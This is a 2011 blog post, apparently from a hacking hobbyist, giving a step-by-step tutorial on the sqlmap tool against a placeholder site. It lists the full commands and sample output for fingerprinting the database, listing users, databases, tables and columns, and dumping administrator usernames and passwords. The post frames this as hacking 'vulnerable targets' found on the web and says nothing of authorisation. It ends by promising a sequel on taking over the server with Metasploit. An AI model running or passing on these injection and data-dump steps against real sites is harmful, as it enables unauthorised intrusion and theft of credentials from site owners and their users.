Thursday, April 28, 2011

SQLMAP Basic Introduction and Tutorial

There are times when manual efforts just wont work or you plain dont have the skills and other famous tools like Havij dont seem to do the trick either. I experienced one of these times recently and it lead me to another great tool that just doesn't seem to be as popular - SQLMAP. I had a site the other day I was working on my injections with and could not get it manually due to poor skills at timing things, reading results, and PATIENCE. Havij was cracking out due to timing method sucking and I dont have skills to do it manually (props to those that can), so here is a tutorial I put together on how to go about cracking this thing wide open using the less commonly known tool SQLMAP. Let me first start by saying if you are afraid of the command line then just leave now because there is no GUI for this and I dont think there ever will be. If you really want to hack you need to get familiar with it so why not start now. Let's begin...

There is no need to waste time with $hitcash and other download sites. For a stable and virus free copy just get from the official site here: http://sqlmap.sourceforge.net/  
             Direct to Download Page: http://sourceforge.net/projects/sqlmap/files/sqlmap/

You will simply extract this to the desired folder you want to run and use it from. As mentioned this is a command line tool, NO GUI. If you want to add it to your path variable so you can run it from anywhere the command prompt opens by following these simple steps:

 1) Right click on Computer and choose Properties option
 2) In the System window click on Advanced system settings in the left pane
 3) In the System Properties window select Advanced tab and click on Environment Variables
 4) In the Environment Variables window you will notice two columns User variables for a username and System  variables - we need the user variable to the PATH so it knows where to open the program wherever we decide to open  CMD from
 5) Now to add a PATH to the User variable, highlight PATH and click on New… button. In the New User Variable dialog  box type the Variable name and Variable value and click OK button. If you are unsure you can choose to edit the  PATH variable to see how it is done (IF YOU CHANGE THIS YOU MAY HAVE PROBLEMS, SO BE CAREFULL, now just add path to  sqlmap.exe to the end and your done, hit OK and save.
     5a) To remove a User variable click on the required User variable and then click on Delete button
     5b) To edit a User variable click on Edit… button. In the Edit User Variable dialog box
     edit the Variable name and Variable value and click OK button

NOTE: you can skip the path variable part if you want but then you must be in the folder to run it from command line (I am lazy and dont like to navigate so I like to set it and forget it)

OK now you should be ready to get started...open the command prompt and type sqlmap or sqlmap.exe to see if you set the path variable correctly. If you get "error: missing a mandatory parameter..." then you are in business. To begin I suggest opening two command prompts at the same time and put them side by side (it will help make this easier to visualize and learn while we go through this tutorial). On one side you need to simply type in 'sqlmap --help' and see what follows, you will quickly see sqlmap has a LOT of options available for you to choose from. I will cover some of the basics to help get you started. Keep the help menu open on one side and now we will begin working from the other side.

I will assume you have done your own searching on the web to find some vulnerable targets, so let's get started testing them. we will use the '-u' option to define our target site, like this:

EX: sqlmap -u http://site.com/example.php?id=1

Results...PHP 5.2.14, Apache 2.2.17, MySQL 5
this will perform a basic run at the target to test for injection, simply providing basic overview info. We can use the '-f' parameter to get some more specific information from our target, like this:

EX: sqlmap -u http://site.com/example.php?id=1 -f

Results are not too much more than previous (you get column count or vulnerable column if you pay close attention to info retrieved as well as specifics on version). The results will also be stored for the entire session in the 'output' folder wherever sqlmap is physically installed - it also shows the commands used to get the info. That doesnt really tell us a lot so lets grab the site banner to see what it can tell us as well as some other useful info from the Database itself by changing up the command and adding a few more paramaters, like so:

EX: sqlmap -u http://site.com/example.php?id=1 -f -b --current-user --current-db --is-dba --users --dbs
Results:

NOTE: it seems to process them in the order you pass the arguments, so if it fails along the way you dont get the rest. For this reason I usually start with the above command and then start to change from there to get more info...

-f = Back-end DBMS: active fingerprint: MySQL >= 5.0.38 and < 5.1.2
              comment injection fingerprint: MySQL 5.1.00
              banner parsing fingerprint: MySQL 5.0.92
-b = banner:    '5.0.92-community'
--current-user  =  read from file 'C:\sqlmap-0.8_exe\output\site.com\session': user@localhost
--current-db = same as above, reads from session file created for scan but shows current database
--is-dba = same as above, reads from session file created for scan but shows if current user is DBA: 'TRUE' or 'False'
--users = same as above, reads from session file created for scan but shows  number of database users and usernames
--dbs = same as above, reads from session file created for scan but shows ALL of the databases available, not just current
 current user:    'user@localhost'
 current database: database1
 system users [1]: 'user'@'localhost'
 current user is DBA:    'False'
 vailable databases [5]:
 [*] information_schema
 [*] database1
 [*] database2
 [*] database3
 [*] database4

This pretty much gets you set up with the basic info, you can go a step further and add the '--passwords' to the end of the command to try and extract the users passwords fro database users if they are available. This is not always effective though (i.e. no MySQL table) which is why it is best to add after the basics or at the end of your recon session, like so:

EX: sqlmap -u http://site.com/example.php?id=1 -f -b --current-user --current-db --is-dba --users --dbs --passwords

OR by itself following our recon command like this:

EX: sqlmap -u http://site.com/example.php?id=1 --passwords

You can also check user priveleges '--priveleges' to check user priveleges as well as roles '--role'..., but what if you want to dig deeper into the Database(s) to find more info, no problem....let's keep going and extract all of the table names and columns...

Now we need to keep it simple and just request what we need using these new parameters: '--tables', '--columns', and '-D', like this:

EX: sqlmap -u http://site.com/example.php?id=1 --tables -D database1

Results....it will load all of the results into the log file stored in the "output" folder wherever you installed sqlmap physically on your system, while it also prints the results to the screen.

The results would look something like this:
[16:10:05] [INFO] fetching tables for database 'database1'
[16:10:05] [INFO] fetching number of tables for database 'database1'
[16:10:05] [INFO] retrieved: 13
[16:10:16] [INFO] retrieved: access
[16:10:53] [INFO] retrieved: action
[16:11:40] [INFO] retrieved: ad
[16:11:55] [INFO] retrieved: adcriteria
[16:13:02] [INFO] retrieved: adminhelp
[16:13:56] [INFO] retrieved: administrator
[16:15:14] [INFO] retrieved: adminlog
[16:16:00] [INFO] retrieved: adminmessage
[16:17:26] [INFO] retrieved: bbcode
[16:18:26] [INFO] retrieved: config
[16:19:26] [INFO] retrieved: db_users
[16:20:26] [INFO] retrieved: users
[16:21:26] [INFO] retrieved: etc
Database: database1
[13 tables]
+-----------------+
| access              |
| action              |
| ad                    |
| adcriteria         |
| adminhelp        |
| administrator   |
| adminlog          |
| adminmessage |
| bbcode             |
| config              |
| db_users          |
| users                |
| etc                   |
+-----------------+
....and so on until it is done finding all of the tables for the database you specified with the '-D database1' paramater earlier...and now we find the columns for the tables found above...

EX: sqlmap -u http://site.com/example.php?id=1 --columns -D database1 -T administrator

Results....remember you can check your logs in "output" folder...The results would look something like this:
[16:30:05] [INFO] fetching columns for table 'administrator' on database 'database1'
[16:33:05] [INFO] fetching number of columns for table 'administrator' on database 'database1'
[16:36:05] [INFO] retrieved: 3
[16:39:16] [INFO] retrieved: user
[16:45:53] [INFO] retrieved: pass
[16:46:40] [INFO] retrieved: id
[16:49:26] [INFO] retrieved: etc
Database: database1
Table: administrator
[3 Columns]
+-----------+----------------+
| Column    |     Type         |
+-----------+----------------+
| user         | varchar(250) |
| pass         | varchar(250) |
| ID            | int(11)           |
| etc           | varchar(100) |
+-----------+----------------+
....and so it goes on until it is done finding all of the columns and tables for the database you specified with the '-D database1 -T administrator' paramaters earlier...BUT no you may be asking yourself how do we get that precious data out of there?

Like this:
EX: sqlmap -u http://site.com/example.php?id=1 --dump -D database1 -T administrator -C user,pass,id

Results....remember you can check your logs in "output" folder...The results would look something like this:
[18:51:57] [INFO] fetching columns 'user, pass, id' entries for table
 'administrator' on database 'database1'
[18:51:57] [INFO] fetching number of columns 'user, pass, id' entries for table 'administrator' on database 'database1'
[18:51:57] [INFO] read from file 'C:\sqlmap-0.8_exe\output\www.site.com\session': 2
[18:51:57] [INFO] read from file 'C:\sqlmap-0.8_exe\output\www.site.com\session': 1
[18:51:57] [INFO] retrieved: IhazYOURpassWZORD
[18:52:52] [INFO] retrieved: admin
[18:53:34] [INFO] read from file 'C:\sqlmap-0.8_exe\output\www.site.com\session': 2
[18:53:34] [INFO] retrieved: IhazYOURpassWZORDtoo
[18:54:34] [INFO] retrieved: JohnDoe
Database: database1
Table: administrators
[2 entries]
+-----+---------------------------------+------------+
|   ID  |                Password              |     user      |
+-----+---------------------------------+------------+
| 1      |  IhazYOURpassWORD      |    admin    |
| 2      | IhazYOURpassWORDtoo  | JohnDoe   |
+-----+---------------------------------+------------+
[18:55:14] [INFO] Table 'database1.administrator' dumped to CSV file 'C:\sqlmap-0.8_e
xe\output\www.site.com\dump\database1\administrator.csv'
[18:55:14] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.8_exe\out
put\www.site.com'
That sums up our basic introduction to SQLMAP. Ideas for next series...SQLMAP Round 2: From Dumping to Owning the DB Server. Using ninja skills with sqlmap to interact with the system registry and filesystem access, as well as gaining access to the underlying operating system and executing system commands with a little assistance from the incorporation of Metasploit to the attack scenario. I hope you enjoyed this episode and stay tuned for more to come in the next series...

Later - H.R.